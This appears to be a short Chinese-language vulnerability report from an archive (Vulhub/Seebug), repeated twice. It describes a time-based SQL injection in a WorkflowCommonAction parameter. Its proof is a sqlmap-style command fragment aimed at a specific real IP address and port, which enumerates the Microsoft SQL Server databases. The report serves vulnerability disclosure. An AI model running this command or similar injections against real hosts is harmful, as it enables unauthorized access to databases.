VULHUB ™

### 简要描述： sql注入,您要跑出数据证明,那我就给你跑出数据的图,说了 延时注入时间较慢.不知道为什么 您不信呢. ### 详细说明： 问题处在WorkflowCommonAction acton 参数没有过滤 ### 漏洞证明： -u "http://119.254.81.197:7001/defaultroot/WorkflowCommonAction.do?curActivityId=1&flag=back" --dbms="Microsoft SQL Server" --dbs [<img src="https://images.seebug.org/upload/201409/242054294545a0555131713232a21b4c0b91bbaa.jpg" alt="123.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/242054294545a0555131713232a21b4c0b91bbaa.jpg)

### 简要描述： sql注入,您要跑出数据证明,那我就给你跑出数据的图,说了 延时注入时间较慢.不知道为什么 您不信呢. ### 详细说明： 问题处在WorkflowCommonAction acton 参数没有过滤 ### 漏洞证明： -u "http://119.254.81.197:7001/defaultroot/WorkflowCommonAction.do?curActivityId=1&flag=back" --dbms="Microsoft SQL Server" --dbs [<img src="https://images.seebug.org/upload/201409/242054294545a0555131713232a21b4c0b91bbaa.jpg" alt="123.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/242054294545a0555131713232a21b4c0b91bbaa.jpg)